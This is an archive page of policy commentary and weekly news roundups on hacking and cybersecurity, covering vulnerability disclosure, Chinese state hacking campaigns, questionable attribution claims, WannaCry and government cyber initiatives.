Tag Archive for: Hacking

Australia’s cyber strategy needs a vulnerability disclosure upgrade

Australia is in a race against time. Cyber adversaries are exploiting vulnerabilities faster than we can identify and patch them. Both national security and economic considerations demand policy action.

According to IBM’s Data Breach Report, the average cost of a data breach in Australia reached a record $4.26 million in 2024. By contrast, identifying vulnerabilities through ethical hackers costs on average $1670, according to HackerOne’s annual security report.

The equation is simple: preventing breaches through the disclosure of vulnerabilities is far cheaper than dealing with the fallout of a successful attack.

While vulnerability disclosure programs are mandatory for Australian government entities under the Protective Security Policy Framework, they are not required for other organisations. Any organisation can start such a program without significant outlay, though some use rewards to incentivise testing.

Certainly, the Australian government has made progress. Amendments to the Security of Critical Infrastructure Act imposed stronger cybersecurity obligations. The Cybersecurity Act, passed in November 2024, also lays a foundation for addressing cyber risks. One promising element of the act is the development of a security standard for connected devices, which will require manufacturers to provide structured channels for ethical hackers to report vulnerabilities.

This measure should be an early step toward a national coordinated vulnerability disclosure policy. Such disclosure, often including a public-facing vulnerability disclosure program, is a cybersecurity best practice that provides clear guidelines for ethical hackers to report vulnerabilities to organisations before malicious actors can exploit them. Coordinated vulnerability disclosure may also encompass vulnerability rewards programs, also known as bug bounty programs, that, through reward, incentivise ethical hackers to responsibly disclose vulnerabilities.

In addition to the rising costs of breaches, our cyber adversaries are pushing ahead with the exploitation of existing bugs and hoovering up new ones.

The widely reported Volt Typhoon operation offers an insight into the national security threat. Since at least mid-2021, state-backed Chinese hackers strategically pre-positioned themselves within critical systems in the United States.

The 2024 Annual Threat Assessment from the US Office of the Director of National Intelligence underscores the intent behind such operations:

If Beijing believed that a major conflict with the United States were imminent, it would consider aggressive cyber operations against U.S. critical infrastructure and military assets. Such a strike would be designed to deter U.S. military action by impeding U.S. decision-making, inducing societal panic, and interfering with the deployment of U.S. forces.

Cooperation with Five Eyes partners has led to joint advisories and critical network threat-hunting efforts, but the Volt Typhoon operation underscores that unmitigated vulnerabilities pose a strategic risk for Australia.

China has taken deliberate steps to make operations using unmitigated vulnerabilities not only viable but the new normal. To get to this operational footing, China integrated vulnerability reporting into its national cybersecurity framework. Under China’s 2021 National Security Law, all cybersecurity vulnerabilities, particularly those in critical infrastructure, must be reported to authorities regardless of mitigation status. By all accounts, China has done a remarkable job of setting up a framework to industrialise vulnerability disclosure to further its strategic objectives.

Australia is making progress, but not quickly enough to keep pace. Other states’ vulnerability collection and exploitation efforts are advancing much more quickly. China’s strategic use of zero-day exploits demonstrates how adversaries can rapidly identify, collect and weaponise vulnerabilities, gaining a significant tactical advantage.

As the Australian government moves into Horizon Two of the National Cyber Security Strategy 2023–2030, it must prioritise addressing long-term vulnerabilities and increasing resilience. The next phase of the strategy should include the formalisation of a national coordinated vulnerability disclosure policy, including the strong endorsement of vulnerability disclosure programs to encourage an economy-wide ‘see something, say something’ approach to cybersecurity.

One important element of it could also include federal funding of bug bounty programs across the federal government. This would also bring Australia in line with the US and Britain, who have embraced these programs to identify and report vulnerabilities in their defence portfolios. At a time when the security of the AUKUS program is paramount, any gap that leaves Australia’s defence systems vulnerable to undetected exploits could jeopardise national security and undermine our allies’ confidence in Australian information security.

In an era of evolving cyber threats, Australia’s national security and economic future depend on the resilience of its digital infrastructure. A national coordinated vulnerability disclosure policy is essential for addressing vulnerabilities before they are exploited. With cyber adversaries such as China shifting their cyber doctrine to exploit vulnerabilities, the time to act is now.

In case we forgot, Typhoon attacks remind us of China’s cyber capability—and intent

Australians need to understand the cyber threat from China.

US President Donald Trump described the launch of Chinese artificial intelligence chatbot, DeepSeek, as a wake-up call for the US tech industry. The Australian government moved quickly to ban DeepSeek from government devices.

This came just weeks after the Biden administration stunningly admitted on its way out of office that Chinese Communist Party hackers were targeting not just political and military systems but also civilian networks such as water and health. The hackers could shut down US ports, power grids and other critical infrastructure.

These incidents remind us that China has the intent, and increasingly the capability, to seriously challenge US and Western technology advantage. Australia will be an obvious target if regional tensions continue to rise. It must be well-prepared.

As ASPI’s Critical Technology Tracker highlights, China’s advances in critical technologies have been foreseeable for some time. US and Western confidence is manifesting as complacency.

DeepSeek has emerged as a cheap, open-source AI rival to the seemingly indomitable US models. It could enable Chinese technology to become enmeshed in global systems, perhaps even in critical infrastructure.

Meanwhile, Chinese hackers have stealthily embedded themselves in US critical infrastructure, potentially enabling sabotage, or the coercive threat of sabotage, to extract something Beijing wants. The two main perpetrators of these operations are Salt Typhoon and Volt Typhoon. The Chinese government backs both.

Salt Typhoon’s infiltration of at least nine US telecom networks has enabled CCP-sponsored hackers to geolocate individuals and record phone calls, directly threatening personal privacy and national security. This devastating counterintelligence failure includes the identification of individuals that US agencies suspect are agents working for China. It also enables CCP surveillance and coercion of US nationals and Chinese dissidents.

If anything, Volt Typhoon poses a greater threat, with covert access to critical infrastructure networks. Each reinforces the dangers of the other.

Some US officials involved in the investigation have said the hack is so severe, and the networks so compromised, that the United States may never be sure the intruders have been fully rooted out.

Both operations demonstrate sophisticated stealth. In particular, Volt Typhoon’s technique of living off the land—in which they sit at length in the systems, using its own resources—made detection harder. It could gain outwardly legitimate access without the requirement for malware. This reveals an intent to map and maintain access to critical systems, not for immediate destruction, but for whenever best serves Beijing’s interests. In this sense, it can be seen as a precursor to war.

The focus on critical infrastructure underscores how malicious cyber operations can undermine national resilience during peacetime and crises and sow doubt on a government’s ability to safeguard the people. Through these operations, adversaries could influence a target country’s decisions as leaders avoid taking any action that might provoke a disruption or sabotage.

Australia’s intelligence agencies are aware of these risks. Australia’s director-general of security, Mike Burgess, warned in his 2024 annual threat assessment that ‘the most immediate, low cost and potentially high-impact vector for sabotage [by foreign adversaries] is cyber’. This was reinforced in his 2025 assessment when he declared that ‘foreign regimes are expected to become more determined to, and more capable of, pre-positioning cyber access vectors they can exploit in the future.’ He warned that we’re getting closer to the threshold for ‘high-impact sabotage’.

The Australian Signals Directorate has been improving preparedness and resilience. It has helped Australian organisations to defend themselves and mitigate prepositioning and living-off-the-land techniques. ASD has also been building offensive capabilities needed to impose costs on attackers.

We must avoid the traps China sets as it seeks global information dominance. First, we can’t be complacent. It’s unsafe to assume that the US and its allies will remain decisively better than China, and that we can counter whatever Beijing can do. Second, we must reject the viewpoint that ‘everyone spies so it would be hypocritical to condemn China’, as it is a false moral equivalence. Third, we must avoid arguing that there isn’t present threat just because Beijing doesn’t have the intent to go to war today. This wishful thinking is a dangerous mistake. If we fall into these traps, we present Beijing with more time and render ourselves incapable of advancing our interests.

Chinese capabilities are strong and growing, and the way they are being used by the CCP demonstrates clear malign intent. This should be pushing elected governments to take the protective action and prepare for future cyber operations.

The reluctance to see the threats in the information domain as equal to traditional threats is a decades-old mistake that must be corrected. We need to minimise our dependence on China for technology.

Hacking the headlines: the geopolitics of cybersecurity marketing

The intersection of geopolitics and cybersecurity can make for an irresistible headline. For the media, it’s a great story; for political players, it’s a talking point they can use to appeal to their base or to browbeat their opponents with; and for cybersecurity companies, it can be an unbeatable opportunity to raise their profile and market their services.

That can, however, encourage some of the individuals and institutions that bring allegations of hacking and espionage to light to make the biggest, most explosive claims possible. Sometimes accuracy, nuance or reasonable doubt go under the bus.

Two very high-profile hacking allegations with serious geopolitical implications have been made in recent weeks, but close inspection shows them to be based on thin and inconclusive evidence from private cybersecurity companies.

The first case involves a subsidiary of Burisma, the Ukrainian gas company which became embroiled in Donald Trump’s impeachment trial. ‘Russians hacked Ukrainian gas company at center of impeachment’, was the New York Times’ headline on 13 January. ‘Russians breached Burisma during Trump impeachment probe’, proclaimed the Wall Street Journal, while Fox went with ‘Russians hacked Burisma, Ukrainian company that hired Hunter Biden: Researchers’.

The researchers the Fox headline refers to were from Area 1 Security, a cybersecurity company that provides phishing detection and prevention services to private-sector and political organisations. Area 1’s CEO, Oren Falkowitz, told the Associated Press and Time magazine that his company’s findings were ‘incontrovertible’.

In fact, the story of a Russian hack on Burisma has proved to be very controvertible. There are two issues at play here. One is the way in which some media coverage has misinterpreted or exaggerated Area 1’s findings. The second is the report itself. It’s eight pages long, but that includes one each for the title page, the end page and three screenshots. This short document provides inconclusive evidence that any successful hack of Burisma or its subsidiary took place, or that Russian state-linked actors were responsible.

Despite the headlines decrying a Russian attack on Burisma itself, the report actually alleges that Russia’s GRU was seeking to phish email credentials from a Burisma subsidiary, KUB-Gas LLC. Area 1’s analysis is based on the fact that someone has registered lookalike domains for remote email login pages belonging to KUB-Gas and other Burisma subsidiaries. Area 1 asserts this was the GRU (Russia’s military intelligence agency) based on past patterns of behaviour.

So, this was a phishing attempt, not a hack; there’s no indication it was successful; and evidence linking the phishing attempt to the GRU is highly circumstantial.

Facebook’s former head of security Alex Stamos wrote on Twitter: ‘This report tying GRU to a Burisma phishing attack is both literally and figuratively very thin. No details on what data they have other than a public phishing page. The absolute rhetorical certainty instead of standard language on confidence level are red flags.’

Stamos notes that large incident response and tech companies have earned the benefit of the doubt on attribution claims thanks to years of care and obvious access to huge datasets. ‘This isn’t one of those companies and this kind of report doesn’t help [them] build that reputation’, he says.

Nonetheless, the notion that Russia hacked Burisma has become a political talking point—including being cited in House Intelligence Committee chair Adam Schiff’s opening argument at the Senate impeachment hearings. That’s happened despite the claim not being supported by Area 1’s research. Relations among the US, Ukraine and Russia are already fraught; the Burisma hacking allegations can only add to this strain. The geopolitical narrative has taken on a life of without regard to the facts, or the lack of them.

A similar story has been playing out in relation to the alleged hack of Amazon founder Jeff Bezos’s phone by Saudi Arabia’s Crown Prince Mohammed bin Salman. On 22 January, international headlines broke airing allegations that Bezos’s phone had been hacked using malware sent in a WhatsApp message directly from bin Salman’s own account.

However, when the research underlying these claims was published a short time later, it again left more questions than answers.

The allegations are based on a report by FTI Consulting, a cybersecurity company hired by Bezos to analyse his phone after personal photographs were leaked to the media last year. FTI’s analysts found no malware on the device.

What they did find was that in early May 2018, Bezos’s phone began transmitting an unusually large amount of data, shortly after a video file was sent from bin Salman’s WhatsApp account, and continued to transmit a high volume of data for months thereafter. This is strange behaviour and warrants investigation, but it doesn’t constitute solid proof that Bezos’s phone was hacked at all, let alone that it was hacked by bin Salman’s WhatsApp message. There’s nothing to disprove the claim either, but that’s no basis for launching such a serious allegation.

One aspect of the report which has experts puzzled is the claim that WhatsApp’s end-to-end encryption prevented FTI from decrypting the content of the downloader to inspect it for malicious code. The decryption keys should be stored on the device itself, so it’s not clear what—other than, perhaps, simple lack of expertise—prevented FTI from doing so.

Cybersecurity expert Rob Graham wrote on Twitter: ‘I see nothing here that suggests Bezos’ phone was hacked. It contains much that says “anomalies we don’t understand”, but lack of explanations point to incomplete forensics, not malicious APT actors. It uses phrases like “unauthorized exfiltration” to mean “outgoing data we can’t explain”. This is bad for such a report, really bad.’

Again, despite the inconclusive evidence, all it took was the initial headline splash for the ‘Saudi Arabia hacked Jeff Bezos’ political narrative to take off. The geopolitical ramifications of the story were immediately apparent: the United Nations called for an investigation, a mass information operation on social media demanded a Saudi boycott of Amazon, public denials were issued by Saudi officials and bin Salman himself, and equally public questions were raised over the White House’s silence. The impact of the allegations is likely to reverberate for some time.

There are two lessons from all of this. The first is that journalists and media organisations should be asking much tougher questions whenever a cybersecurity company tries to shop them a story that sounds a little too cinematic to be true. They also need to resist the urge to write a splashy but misleading headline. If the research doesn’t prove that a hack actually happened, as in both of these cases, the headline shouldn’t assert that it did.

The second is that cybersecurity companies need to act responsibly when publishing research, particularly research that’s likely to have very real geopolitical consequences. The publicity involved in making an explosive, but poorly supported, allegation is not worth either the potential blowback from making incorrect claims about the activities of nation-states or political figures, or the long-term erosion of their reputations in the cybersecurity field.

Cyber wrap

This week one of the largest ransomware incidents to date, ‘WannaCrypt’ or ‘WannaCry’, affected the operations of at least 300,000 machines worldwide, encrypting and locking victims out until a Bitcoin ransom equivalent to US$300 was paid. It affected the operations of about 40 hospitals and other health organisations in the UK, as well as major infrastructure companies and government agencies across Europe. Australia appears to have escaped the worst of it, with some businesses affected but no major disruptions to critical services. The incident has prompted the usual calls to patch software and update anti-virus services.

UK malware researcher @MalwareTech, became an accidental hero when he registered a domain name found within the WannaCry malware which acted as a ‘kill switch’ for the virus. Not a bad return on a US$10.69 investment. Despite the unexpected relief, variants without the switch have since popped up. Brian Krebs estimates that people have coughed up US$26,148 so far—a paltry return considering the damage done. By comparison, CryptoWall raised US$325 million in 2015. Efforts to uncover those behind WannaCry are in full swing, with some early signs suggesting a North Korean connection.

WannaCry has capitalized on a vulnerability that was part of the cache of NSA tools leaked by Shadow Brokers in mid-April. Microsoft patched the vulnerability in March (MS17-010), and has this week released further patches for unsupported operating systems such as Windows XP. The episode has re-ignited calls from Microsoft for a Digital Geneva Convention, and prompted the company to clip the NSA over the ears for stockpiling these vulnerabilities. However, these altruistic measures from Microsoft, and continuing calls to ‘just patch’ don’t fully consider the difficulty of doing so. Most organisations don’t and didn’t have the resources to update their systems to the latest and most secure versions of Windows. On the other hand, this vulnerability was a security defect in the product that Microsoft put out, yet, under current software licensing law, they’re not held liable. Commentators are questioning why the current incentive structure is for hospitals to take on the costs of paying licensing fees every half-decade to buy security features we expect as a given of any other product.

After a significant delay President Trump has finally signed an executive order to strengthen the cybersecurity of critical infrastructure and federal computer networks. In good news, the order doesn’t appear to be a total car wreck, with Wired calling it ‘refreshingly even-keeled’. It calls for numerous reviews to be completed within 90 days, and has a strong focus on accountability, aligning cyber risk management with budgets, and taking action to replace legacy systems. It has also addressed issues including international cooperation, workforce development and threats to the defence industrial base. The order has found some support in Congress, but Senator John McCain called for more urgent action in finalising a national cybersecurity strategy stressing there was no need for ‘more assessments, reports and reviews.’ Progress may also be further slowed by the lethargic pace of recruitment of senior government cybersecurity officials.

There was also Congressional support for the mandatory application of the NIST cybersecurity framework also included in the executive order. NIST have this week issued their revised set of standards for password best-practice, reversing previous requirements for scheduled password changes and combinations of upper case, lower case letters, numbers and symbols and replacing them with more ‘human-friendly’ requirements that reject previously-compromised passwords. This could include emoji passwords if the user so desires.

The recent Federal Budget contained a couple of interesting cyber-related initiatives. A new Cyber Security Advisory Office (CSAO) will pop up in PM&C’s Digital Transformation Agency (DTA). Funded to the tune of $10.7 million over the forward estimates, the CSAO is the government’s response to recommendations from #censusfail investigations. The Office is tasked with acting as the ‘single, comprehensive source of truth to which agencies can turn to’ for cybersecurity expertise. Aspirational…

The DTA is also set to lead broader IT procurement and projects, including hosting a ‘Digital Investment Management Office’ and a ‘Digital Marketplace’. The Agency will control a $129.6 million ‘Modernisation Fund’ that will focus on modernising agencies, upgrading cultural centres, and consolidating APS-wide IT, finance, and human resources functions into six corporate service hubs. The Fund will also seek to open up government data for public use through the Data Integration Partnership of Australia.

Finally, the Budget has earmarked funds for the DTA to kick off GovPass, a scheme to build a trusted digital identity framework for government services. That’s a lot of projects for an agency that had its future called into question as recently as February this year.

Cyber wrap

Image courtesy of Pixabay user WerbeFabrik.

In big news this week for our Kiwi neighbours, New Zealand opened its first national Computer Emergency Response Team (CERT). CERT NZ, a deliverable of New Zealand’s 2015 Cyber Security Strategy, has been established within the Ministry of Business, Innovation and Employment with NZ$22.2 million funding over four years. CERT NZ will be the centrepiece of New Zealand’s cyber architecture and be responsible for cyber vulnerability and threat identification, incident reporting, response coordination and general readiness support for the Kiwi economy. Communications Minister Simon Bridges stated that the CERT ‘will make it easier for people at work and at home to understand, prevent and recover from cyber security incidents’.

Twitter resisted pressure from the US government last month to unmask the identity of an individual tweeting criticism about President Trump from account @ALT_USCIS. The social media platform filed a law suit to block the administration’s request, citing users’ First Amendment rights to freedom of speech. Twitter’s move was backed by the American Civil Liberties Union, who described it as ‘an affront to our fundamental right to anonymous expression’. Customs and Border Protection proceeded to withdraw the summons the day after Twitter filed the lawsuit. This is a positive development after the administration cracked down on federal agency social media activity in January.

Spanish police arrested Russian computer programmer Pyotr Levashov in Barcelona this week in collaboration with the FBI. While rumours are circling about potential connections between this arrest and the 2016 US presidential election campaign hacking, the central focus looks to be Levashov’s responsibility for the Kelihos botnet. This botnet has enslaved hundreds of thousands of computers and used the resulting network to facilitate international malicious cyber activities such as the mass distribution of spam, spreading of ransomware, and theft of login credentials. The US Department of Justice announced it’s undertaking ‘an extensive effort to disrupt and dismantle the Kelihos botnet’ and the botnet operator is expected to be extradited to the US.

The transition from the Internet’s current IP system for web addressing IPv4 to the next generation protocol IPv6 may not be as seamless as we would hope. The transfer is necessary to fulfil the exponential Internet demand and support. While the current system offers four billion unique IP addresses, IPv6 will offer 340 undecillion. Unfortunately, new research from the NATO Cooperative Cyber Defence Centre of Excellence in Estonia indicates that this complex transition may be introducing vulnerabilities to the system.

In an effort to combat fake news, Google is expanding a fact check program for its search and news services to the entire globe. The company’s idea of providing fact checks to help its users ‘divine fact from fiction’ was initially piloted in the US and UK at the end of last year, but is now available to the whole world. Google isn’t undertaking the checks in-house, but relying on the validations of third party organisations such as PolitiFact, FactCheck.org and Snopes. This tool is a great step in the right direction to combat the spread of misinformation online, providing readers with an indication of how authoritative a source is and whether it reflects the general consensus view.

Notorious hacker(s), the Shadow Brokers, have stepped back in the limelight over the weekend, releasing more alleged hacking tools of the NSA. After leaking a number of stolen NSA exploits in August last year, the group tried and failed to auction off the contents of a second cache for an asking price of $1 million. This week the Shadow Brokers group has published the password needed to decrypt this second cache along with a political rant at President Trump on Medium, chastising him for abandoning his ‘base’. Despite the fanfare, many have been left disappointed by this second dump, which consists mostly of tools that are much older and target operating systems that are generally no longer in service. NSA’s friends over at Langley haven’t had a good week either with Wikileaks releasing the third tranche of the Vault 7 leak on CIA cyber tools, titled ‘Grasshopper’, last Friday.

Dallas learned an important lesson on infrastructure security this week with the city’s emergency warning system being compromised by a hacker. The network of sirens across the city were activated just after midnight on Friday night, triggering public panic, more than 4,400 911 calls and an emergency call wait time of six minutes. The incident highlights the vulnerability of critical national infrastructure and the impact its compromise can have on a government’s ability to deliver essential services. The city has requested assistance from the Federal Communications Commission to identify the source of the breach.

And to finish things off, we’ve got your weekly report reading sorted. Check out McAfee Labs Threat Report, which focuses on intelligence sharing, the Mirai IoT botnet and other threat statistics. Dip into the cyber workforce dilemma with the US Government Accountability Office’s report on how the government should train and recruit the cybersecurity workforce to address the threats to federal IT systems. Lastly, the Center for a New American Security’s Phishing in Troubled Waters will take you through the state of cyber espionage across the Pacific and the Strait of Taiwan. Happy reading!

Cyber wrap

This week we continue our look back at some of the year’s biggest cyber stories in our final cyber wrap for 2016!

China finally adopted its controversial new cybersecurity law on 7 November, much to the dismay of the international community. The law states that companies must provide ‘technical support’ and data access to the government on matters of crime and national security, the vague definition of which has led to concerns that encryption back doors will be demanded. Any data gathered by companies in China will now have to be stored in-country—a requirement known as data-localisation—and companies will be subject to invasive security certification processes, which some believe could pose a threat to intellectual property rights. Despite official denials from the Chinese Foreign Ministry, such concerns sparked an outcry from the international business community and a petition to Premier Li Keqiang from more than 40 global business groups.

The legislation also requires real-name registration for instant messaging services and criminalises online content that undermines ‘national honour’ or subverts China’s sovereignty. Online privacy advocates are worried that the law will further repress freedom of online expression in China, and lead to increasing self-censorship. The implementation rules are still to be formulated, and are expected to come into force on 1 June 2017. Watch this space.

Privacy and data protection took a front seat in the European debate in 2016. The new US–EU data sharing agreement, Privacy Shield, was agreed in June this year. The agreement regulates the transatlantic transfer of EU data by US companies, in place of the ‘Safe Harbour’ model that was struck down last October by the European Court of Justice. The scheme features ‘a number of additional clarifications and improvements’ in response to concerns about US mass surveillance of European citizens. The new data transfer pact, designed by the US Department of Commerce and the European Commission, and which includes stronger restrictions was brought into force on 12 July.

Europe’s data protection focus continued with string of crackdowns on various corporations. Microsoft received a formal notice in July for collecting ‘excessive’ user data through Windows 10 and failing to comply with the French Data Protection Act. The Chair of the National Data Protection Commission, France’s privacy watchdog, accused the company of continuing to transfer data to the US under the provisions of the old Safe Harbour agreement.

Privacy feathers were also ruffled in August when WhatsApp announced a new information sharing deal with Facebook, involving the disclosure of user phone numbers. However, 28 European data collection authorities pushed back with an open letter to WhatsApp’s CEO. This protest, along with investigations in the UK, France and Italy prompted Facebook to stop collecting WhatsApp user data from its European customers. Other companies, including Google, also had run-ins with European privacy regulators this year, and the continent’s focus on data protection is likely to continue into 2017.

The rift between the US government and Apple over access to the iPhone used by Syed Farook, one of the San Bernardino attackers, became the focal point of the encryption debate this year. US law enforcement’s push for Apple to build a back door into the smart phone was resisted and described by Apple CEO Tim Cook as dangerous government ‘overreach’. But in an unexpected twist, the Department of Justice revealed that a third party had provided an alternative method to access Farook’s phone data that ultimately rendered Apple’s cooperation unnecessary.

The divisive court case prompted the release of controversial draft legislation intended to outlaw end-to-end encryption, and the creation of a bipartisan encryption working group under the House Judiciary Committee and House Energy and Commerce Committee. The group just released its year-end report, concluding that ‘any measure that weakens encryption works against the national interest’, laying the ground work for further debate next year.

Russian efforts to influence the US Presidential election campaign caused a major splash this year. The media coverage was dominated by the leak of Democratic National Committee (DNC) donor lists and opposition research by supposed lone-hacker Guccifer 2.0 and the dissemination of more than 20,000 confidential DNC emails via Wikileaks. In October, the US Intelligence Community released a statement that it was ‘confident’ that the Russian government was behind these incidents, which were allegedly designed to undermine Hillary Clinton’s candidacy and ensure a more Putin-friendly administration under Donald Trump. While Trump continues to dismiss the intel agencies’ conclusion as a ‘laughing point’, President Obama is pushing in the opposite direction, suggesting that Russian President Vladimir Putin had a direct hand in these operations and ordering a full investigation into the issue. The US has been criticised for its lack of response to these incidents and Obama says the US will respond ‘at a time and place of our own choosing’. The key question is how these tensions will play out under the new Trump administration.

There are a whole range of interesting cyber developments on the horizon so be sure to follow ICPC’s commentary in 2017. See you next year!